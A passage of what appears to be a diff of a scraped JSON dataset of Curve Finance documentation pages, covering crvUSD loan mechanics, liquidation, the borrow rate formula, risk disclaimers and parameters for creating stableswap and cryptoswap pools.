Concepts Table of contents Loan Details Loan Parameters crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Loan Details Loan Parameters crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health Home $crvUSD Loan Details & Concepts The Loan Details page displays information pertinent to an individual loan, along with features necessary for loan management. Loan Details When a user creates a loan, their collateral is allocated across a range of liquidation prices. Should the asset price fall within this range, the loan will enter soft-liquidation mode. In this state, the user is not allowed to add additional collateral. The only recourse is to either repay with crvUSD or to self-liquidate the loan. Additional displays provide information about the entire LLAMMA system, showing aspects such as the total amount of debt, along with individual wallet balances. On the upper right-hand side of the screen, switching to advanced mode provides additional details about the loan. In advanced mode the UI changes to show more information about the collateral bands . Advanced mode also adds a tab with more info about the entire LLAMMA . Loan Parameters A: The amplification parameter A defines the density of liquidity and band size. Base Price: The base price is the price of the band number 0. Oracle Price: The oracle price is the current price of the collateral as determined by the oracle. The oracle price is used to calculate the collateral's value and the loan's health. Borrow Rate: The borrow rate is the annual interest rate charged on the loan. This rate is variable and can change based on market conditions. The borrow rate is expressed as a percentage. For example, a borrow rate of 7.62% means that the user will be charged 7.62% interest on the loan's outstanding balance. crvUSD Concepts Bands When loans are created, collateral is spread among several bands. Each band has a range of prices for the asset. If the price oracle is inside this range of prices, that particular band of collateral is likely to be liquidated. Info The number of bands has a significant influence on the amount of losses when a loan is in self-liquidation. See here . In the example above, the collateral is distributed into 10 distinct bands. The darker grey indicates collateral that has been converted into crvUSD, while the lighter grey represents the original collateral type. Hovering over any bar reveals details about that specific position within the band, including the corresponding asset prices. During soft liquidation, a band may exhibit a mix of crvUSD and the original collateral. Borrow Rate The borrow rate is variable basd on conditions in the pool. For instance, when collateral price is down and some positions are in soft liquidation, the rate can fall. A decreasing rate creates incentive to borrow and dump, while an increasing rate creates incentives to buy crvUSD and repay. The formula for calculating borrow rate and a cool tool to play around can be found here . Liquidation In soft liquidation, the collateral within a band is at risk of being converted into crvUSD. If the price goes back, it will be rehypothecated into collateral, although it will likely be lower than the initial amount. While in soft liquidation mode, users cannot modify their collateral. The only options available are to either partially or fully repay the debt or opt to self-liquidate the position. If a borrower's health continues to decline, they may face a 'hard liquidation,' functioning more like a standard liquidation process, resulting in the erasement of their position. LLAMMA LLAMA (Lending Liquidation AMM Algorithm) is a fully functional AMM with all the functions a user would expect. For more detail please check the source code . Loan Health Based on a users collateral and borrow amount, the UI will display the Health score and status. If the position is in self-liquidation mode, an additional warning will be displayed. Once a loan reaches 0% health, the loan is eligible to be hard-liquidated. Warning The health of a loan decreases when the loan enters self-liquidation mode, and collateral prices change. These losses do not occur only when prices go down but also when the collateral price rises again, resulting in the de-liquidation of the user's loan. This implies that the health of a loan can decrease even though the collateral value of the position increases. If a loan is not in self-liquidation mode, then no losses occur. Losses also heavily depend on the number of bands used; the more bands there are, the fewer the losses. 2023-10-25 Back to top", "labels": [ "Documentation" ] @@ -1914,15 +1914,15 @@ { "title": "Markets", "html_url": "https://resources.curve.fi/crvusd/markets/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Markets Table of contents Markets Collateral Choices Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Markets Collateral Choices Markets Markets On the Markets page you can view all the available collateral types. The page shows the current borrow rate , total amount of $crvUSD borrowed, and total amount of collateral backing it. If you do not have a position, you can click on any market to create a loan . If you already have a position it will show a dollar sign overlay on the left, and clicking on the market will take you to a page to manage your loan . Collateral Choices While testing $crvUSD, the team created a market for $sfrxETH with a small market cap ($10MM) because it had a compatible oracle. Additional forms of collateral are expected to be approved by the DAO. Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Collateral Choices Markets On the Markets page you can view all the available collateral types. The page shows the current borrow rate , total amount of $crvUSD borrowed, and total amount of collateral backing it. If you do not have a position, you can click on any market to create a loan . If you already have a position it will show a dollar sign overlay on the left, and clicking on the market will take you to a page to manage your loan . Collateral Choices While testing $crvUSD, the team created a market for $sfrxETH with a small market cap ($10MM) because it had a compatible oracle. Additional forms of collateral are expected to be approved by the DAO. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding crvusd", + "title": "Understanding crvUSD", "html_url": "https://resources.curve.fi/crvusd/understanding-crvusd/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Understanding crvusd Table of contents Understanding $crvUSD Risks Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding $crvUSD Risks Understanding crvusd Understanding $crvUSD Curve Stablecoin infrastructure enables users to mint crvUSD using a selection of crypto-tokenized collaterals. Positions are managed passively: if the collateral's price decreases, the system automatically sells off collateral in a soft liquidation mode. If the collateral's price increases, the system recovers the collateral. This process could lead to some losses due to liquidation and de-liquidation. Manage crvUSD positions at https://crvusd.curve.fi/ User guide of crvUSD and introduction of rate & LLAMMA, by 0xreviews Risks Please consider the following risk disclaimers when using the Curve Stablecoin infrastructure: If your collateral enters soft-liquidation mode, you can't withdraw it or add more collateral to your position. Should the price of the collateral drop sharply over a short time interval, your position will get hard-liquidated, with no option of de-liquidation. Please choose your leverage wisely, as you would with any collateralized debt position. If your collateral enters soft-liquidation mode, you can't withdraw it or add more collateral to your position. Should the price of the collateral change drop sharply over a short time interval, it can result in large losses that may reduce your loan's health. If you are in soft-liquidation mode and the price of the collateral goes up sharply, this can result in de-liquidation losses on the way up. If your loan's health is low, value of collateral going up could potentially reduce your underwater loan's health. If the health of your loan drops to zero or below, your position will get hard-liquidated with no option of de-liquidation. Please choose your leverage wisely, as you would with any collateralized debt position. The crvUSD stablecoin and its infrastructure are currently in beta testing. As a result, investing in crvUSD carries high risk and could lead to partial or complete loss of your investment due to its experimental nature. You are responsible for understanding the associated risks of buying, selling, and using crvUSD and its infrastructure. The value of crvUSD can fluctuate due to stablecoin market volatility or rapid changes in the liquidity of the stablecoin. crvUSD is exclusively issued by smart contracts, without an intermediary. However, the parameters that ensure the proper operation of the crvUSD infrastructure are subject to updates approved by Curve DAO. Users must stay informed about any parameter changes in the stablecoin infrastructure. Understanding Curve v2 Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Understanding crvUSD Table of contents Markets Risks Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Markets Risks Home $crvUSD Understanding crvUSD Curve Stablecoin infrastructure allows users to mint crvUSD using a variety of crypto-tokenized collaterals. Positions are managed passively: if the price of the collateral decreases, the system automatically initiates a 'soft-liquidation' process to sell off some of the collateral. Conversely, if the price of the collateral increases, the system recovers the collateral. However, this process may result in some losses due to the liquidations and de-liquidations. Manage crvUSD positions at https://crvusd.curve.fi/ Markets On the 'Markets' tab, all available collateral types are displayed. The page displays the current borrow rate , total debt, debt cap, remaining amount available for borrowing, and the total value of collateral. If no loan exists, clicking on any market will lead to the loan creation page. Should a loan already exist, a dollar sign overlay will appear on the left. Selecting the market will lead to the loan management interface. Risks Please consider the following risk disclaimers when using the Curve Stablecoin infrastructure: If your collateral enters soft-liquidation mode, you can't withdraw it or add more collateral to your position. Should the price of the collateral drop sharply over a short time interval, your position will get hard-liquidated, with no option of de-liquidation. Please choose your leverage wisely, as you would with any collateralized debt position. If your collateral enters soft-liquidation mode, you can't withdraw it or add more collateral to your position. Should the price of the collateral change drop sharply over a short time interval, it can result in large losses that may reduce your loan's health. If you are in soft-liquidation mode and the price of the collateral goes up sharply, this can result in de-liquidation losses on the way up. If your loan's health is low, value of collateral going up could potentially reduce your underwater loan's health. If the health of your loan drops to zero or below, your position will get hard-liquidated with no option of de-liquidation. Please choose your leverage wisely, as you would with any collateralized debt position. The crvUSD stablecoin and its infrastructure are currently in beta testing. As a result, investing in crvUSD carries high risk and could lead to partial or complete loss of your investment due to its experimental nature. You are responsible for understanding the associated risks of buying, selling, and using crvUSD and its infrastructure. The value of crvUSD can fluctuate due to stablecoin market volatility or rapid changes in the liquidity of the stablecoin. crvUSD is exclusively issued by smart contracts, without an intermediary. However, the parameters that ensure the proper operation of the crvUSD infrastructure are subject to updates approved by Curve DAO. Users must stay informed about any parameter changes in the stablecoin infrastructure. 2023-10-18 Back to top", "labels": [ "Documentation" ] @@ -1930,7 +1930,7 @@ { "title": "Understanding tokenomics", "html_url": "https://resources.curve.fi/crvusd/understanding-tokenomics/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics Understanding tokenomics Table of contents $crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents $crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health Understanding tokenomics $crvUSD Concepts Bands When loans are created, collateral is spread among several bands. Each band has a range of prices for the asset. If the price oracle is inside this range of prices, that particular band of collateral is likely to be liquidated. In the example above, the collateral has been spread into 10 different bands of collateral. The darker grey represents collateral which has been converted into $crvUSD, lighter grey is the original collateral type. Mousing over any bar will give you details about your position within the band, as well as the asset prices corresponding to this band. If you are in soft liquidation, the band may have a blend of $crvUSD and the collateral. Borrow Rate The borrow rate is variable basd on conditions in the pool. For instance, when collateral price is down and some positions are in soft liquidation, the rate can fall. A decreasing rate creates incentive to borrow and dump, while an increasing rate creates incentives to buy $crvUSD and repay. The formula for calculating Borrow Rate is: rate = rate0 * exp(-(p - 1) / sigma) * exp(-peg_keeper_debt / (total_debt * peg_keeper_target_fraction)) Liquidation In soft liquidation, the collateral within a band is at risk of being converted into crvUSD. If the price goes back, it will be rehypothecated into collateral, although it will likely be lower than the initial amount. While in soft liquidation mode, users cannot modify their collateral. The only options available are to either partially or fully repay the debt or opt to self-liquidate the position. If your health continues to weaken, you may find yourself subject to \"hard liquidation,\" which functions more like a usual liquidation, where your position is erased. LLAMMA LLAMA (Lending Liquidation AMM Algorithm) is a fully functional AMM with all the functions you would expect. For more detail please check the source code . Loan Health Based on your collateral and borrow amount, the UI will display the Health score. Low health scores are more at risk of entering liquidation mode in the event the asset price drops. Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents $crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health Understanding tokenomics $crvUSD Concepts Bands When loans are created, collateral is spread among several bands. Each band has a range of prices for the asset. If the price oracle is inside this range of prices, that particular band of collateral is likely to be liquidated. In the example above, the collateral has been spread into 10 different bands of collateral. The darker grey represents collateral which has been converted into $crvUSD, lighter grey is the original collateral type. Mousing over any bar will give you details about your position within the band, as well as the asset prices corresponding to this band. If you are in soft liquidation, the band may have a blend of $crvUSD and the collateral. Borrow Rate The borrow rate is variable basd on conditions in the pool. For instance, when collateral price is down and some positions are in soft liquidation, the rate can fall. A decreasing rate creates incentive to borrow and dump, while an increasing rate creates incentives to buy $crvUSD and repay. The formula for calculating Borrow Rate is: rate = rate0 * exp(-(p - 1) / sigma) * exp(-peg_keeper_debt / (total_debt * peg_keeper_target_fraction)) Liquidation In soft liquidation, the collateral within a band is at risk of being converted into crvUSD. If the price goes back, it will be rehypothecated into collateral, although it will likely be lower than the initial amount. While in soft liquidation mode, users cannot modify their collateral. The only options available are to either partially or fully repay the debt or opt to self-liquidate the position. If your health continues to weaken, you may find yourself subject to \"hard liquidation,\" which functions more like a usual liquidation, where your position is erased. LLAMMA LLAMA (Lending Liquidation AMM Algorithm) is a fully functional AMM with all the functions you would expect. For more detail please check the source code . Loan Health Based on your collateral and borrow amount, the UI will display the Health score. Low health scores are more at risk of entering liquidation mode in the event the asset price drops. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1938,7 +1938,7 @@ { "title": "Creating a cryptoswap pool", "html_url": "https://resources.curve.fi/factory-pools/creating-a-cryptoswap-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Creating a cryptoswap pool Table of contents Creating a Cryptoswap Pool Creating a Pool Tokens in Pool Pool Presets Parameters Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Creating a Cryptoswap Pool Creating a Pool Tokens in Pool Pool Presets Parameters Creating a cryptoswap pool Creating a Cryptoswap Pool The v2 Curve Factory supports pools of assets with volatile prices, with no expectation of price stability. Understanding Curve v2 Creating a Pool The factory can be used to create a pool between any two or three ERC20 tokens. Based on trading activity in the pool, the v2 pools update an internal price oracle that the pool uses to rebalance itself. If the pool is using wrapped Ethereum as one of the two assets, the pool will also support depositing either raw ETH or wrapped Ethereum. Tokens in Pool The token selection tab can be used to select up to three tokens. The order of the tokens can matter for the performance of the AMM. Make sure to select the token with the higher price is first. If the tokens are supported by CoinGecko, you can see the \"Initial Price\" under the Pool Setup panel, choose the token order to maximize this value. On Ethereum at the top of the token selection popup you can see any Curve basepools suggested up top. These allow you to create a metapool , where the other asset can trade with any of the underlying basepool assets. You can search by name for any token already added to Curve, or paste a token address Pool Presets The \"Pool Presets\" tab provides scenarios that prepopulate appropriate parameters for users who are unfamiliar with advanced aspects of Curve pools. Some examples: Crypto: Used volatile pairings for tokens which are likely to deviate heavily in price Forex: Pairings that have low volatility Liquid Staking Derivatives: Similar to $cbETH and $rETH which handle Ethereum LSDs Tricrypto: Suitable for pools containing a USD stablecoin, BTC stablecoin and ETH. Three Coin Volatile: Suitable for pools containing a volatile token which is paired against ETH and USD stablecoins. Parameters On the parameters tab you can review and adjust the defaults populated by your selection on the \"pool presets\" tab. Crypto v2 pools contain a lot of parameters. If you are uncertain of which parameters to use, you may want to ask for help in any Curve channel before deploying. Some parameters can be tuned after the fact. The basic parameters include the fees charged to users who interact with the pool. This is divided dynamically into a \"Mid fee\" and \"Out fee\" parameter, which represent the minimum and maximum fee during periods of low and high volatility. Mid Fee: [.005% to 1%] Percentage. Fee when the pool is maximally balanced. This is the minimum fee. The fee is calculated as mid_fee * f + out_fee * (10^18 - f) Out Fee: [Mid Fee to 1%] Fee when the pool is imbalanced. Must be larger than the Mid Fee and represents the maximum fee. The initial prices fetch current prices from Coingecko to set the initial liquidity concentration. If your tokens do not exist on Coingecko you will need to populate these values manually, otherwise they will be filled automatically. The Advanced toggle allows you to adjust several of the other parameters under the hood. Amplification Parameter (A): [4,000 to 4,000,000,000] Larger values of A make the curve better resemble a straight line in the center (when pool is near balance). Highly volatile assets should use a lower value, while assets that are closer together may be best with a higher value. Gamma: [.00000001 to .02] The gamma parameter can further adjust the shape of the curve. Default values recommend .000145 for volatile assets and .0001 for less volatile assets. Allowed Extra Profit: [0 to .01] As the pool takes profit, the allowed extra profit parameter allows for greater values. Recommended 0.000002 for volatile assets and 0.00000001 for less volatile assets. Fee Gamma: [0 to 1] Adjusts how fast the fee increases from Mid Fee to Out Fee. Lower values cause fees to increase faster with imbalance. Recommended value of .0023 for volatile assets and .005 for less volatile assets. Adjustment Step: [0 to 1] As the pool rebalances, it will must do so in units larger than the adjustment step size. Volatile assets are suggested to use larger values (0.000146), while less volatile assets do not move as frequently and may use smaller step sizes (default 0.0000055) Moving Average Time: [0 to 604,800] In seconds -- the price oracle uses an exponential moving average to dampen the effect of changes. This parameter adjusts the half life used. A more thorough reader on the parameters can be found here . You can use this interactive tool to see how some of the parameters interact. After deployment, make sure to seed initial liquidity and create a gauge just like regular factory pools . Creating a Pool Gauge Last update: 2023-08-25 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Creating a cryptoswap pool Table of contents Creating a Pool Tokens in Pool Pool Presets Parameters Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Creating a Pool Tokens in Pool Pool Presets Parameters Home Factory Pools Creating a cryptoswap pool The v2 Curve Factory supports pools of assets with volatile prices, with no expectation of price stability. Understanding Curve v2 Creating a Pool The factory can be used to create a pool between any two or three ERC20 tokens. Based on trading activity in the pool, the v2 pools update an internal price oracle that the pool uses to rebalance itself. If the pool is using wrapped Ethereum as one of the two assets, the pool will also support depositing either raw ETH or wrapped Ethereum. Tokens in Pool The token selection tab can be used to select up to three tokens. The order of the tokens can matter for the performance of the AMM. Make sure to select the token with the higher price is first. If the tokens are supported by CoinGecko, you can see the \"Initial Price\" under the Pool Setup panel, choose the token order to maximize this value. On Ethereum at the top of the token selection popup you can see any Curve basepools suggested up top. These allow you to create a metapool , where the other asset can trade with any of the underlying basepool assets. You can search by name for any token already added to Curve, or paste a token address Pool Presets The \"Pool Presets\" tab provides scenarios that prepopulate appropriate parameters for users who are unfamiliar with advanced aspects of Curve pools. Some examples: Crypto: Used volatile pairings for tokens which are likely to deviate heavily in price Forex: Pairings that have low volatility Liquid Staking Derivatives: Similar to $cbETH and $rETH which handle Ethereum LSDs Tricrypto: Suitable for pools containing a USD stablecoin, BTC stablecoin and ETH. Three Coin Volatile: Suitable for pools containing a volatile token which is paired against ETH and USD stablecoins. Parameters On the parameters tab you can review and adjust the defaults populated by your selection on the \"pool presets\" tab. Crypto v2 pools contain a lot of parameters. If you are uncertain of which parameters to use, you may want to ask for help in any Curve channel before deploying. Some parameters can be tuned after the fact. The basic parameters include the fees charged to users who interact with the pool. This is divided dynamically into a \"Mid fee\" and \"Out fee\" parameter, which represent the minimum and maximum fee during periods of low and high volatility. Mid Fee: [.005% to 1%] Percentage. Fee when the pool is maximally balanced. This is the minimum fee. The fee is calculated as mid_fee * f + out_fee * (10^18 - f) Out Fee: [Mid Fee to 1%] Fee when the pool is imbalanced. Must be larger than the Mid Fee and represents the maximum fee. The initial prices fetch current prices from Coingecko to set the initial liquidity concentration. If your tokens do not exist on Coingecko you will need to populate these values manually, otherwise they will be filled automatically. The Advanced toggle allows you to adjust several of the other parameters under the hood. Amplification Parameter (A): [4,000 to 4,000,000,000] Larger values of A make the curve better resemble a straight line in the center (when pool is near balance). Highly volatile assets should use a lower value, while assets that are closer together may be best with a higher value. Gamma: [.00000001 to .02] The gamma parameter can further adjust the shape of the curve. Default values recommend .000145 for volatile assets and .0001 for less volatile assets. Allowed Extra Profit: [0 to .01] As the pool takes profit, the allowed extra profit parameter allows for greater values. Recommended 0.000002 for volatile assets and 0.00000001 for less volatile assets. Fee Gamma: [0 to 1] Adjusts how fast the fee increases from Mid Fee to Out Fee. Lower values cause fees to increase faster with imbalance. Recommended value of .0023 for volatile assets and .005 for less volatile assets. Adjustment Step: [0 to 1] As the pool rebalances, it will must do so in units larger than the adjustment step size. Volatile assets are suggested to use larger values (0.000146), while less volatile assets do not move as frequently and may use smaller step sizes (default 0.0000055) Moving Average Time: [0 to 604,800] In seconds -- the price oracle uses an exponential moving average to dampen the effect of changes. This parameter adjusts the half life used. A more thorough reader on the parameters can be found here . You can use this interactive tool to see how some of the parameters interact. After deployment, make sure to seed initial liquidity and create a gauge just like regular factory pools . Creating a Pool Gauge 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1946,15 +1946,15 @@ { "title": "Creating a stableswap pool", "html_url": "https://resources.curve.fi/factory-pools/creating-a-stableswap-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a stableswap pool Table of contents Creating a Stableswap Pool Token Selection Pool Presets Parameters Pool Info Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Creating a Stableswap Pool Token Selection Pool Presets Parameters Pool Info Creating a stableswap pool Creating a Stableswap Pool The Stableswap pool creation is appropriate for assets expected to hold a price peg very close to each other, like a pair of dollarcoins. The creation wizard will guide you through the process of creating a pool, but if you have questions throughout you are encouraged to speak with a member of the Curve team in the Telegram or Discord . Token Selection The token selection tab can be used to select between two to four tokens. You can select a token by searching for the symbol of any token that is already being used on Curve, or by pasting the pools address. On Ethereum you might observe a handful of popular assets (ie Tether, USDC, Frax) are not available in the token selection dropdown. Some of these assets have been added to \"base pools,\" which can be used in the creation of other \"metapools.\" Base & MetaPools Base pools are suggested at the top of the token selection modal. As of April 2023, Curve supported two stablecoin basepools (3CRV/FraxBP) and a BTC basepool (sbTC2Crv). If you want to include a token that is part of a base pool, you must use it as part of a corresponding base pool. Base pools can only be paired with one other token. If you are using raw ether as a token, it must be added as \"Token A.\" WETH may be added as either Token A or Token B. If your pool contains rebasing tokens (a token that adjusts its total supply to control its price), make sure to 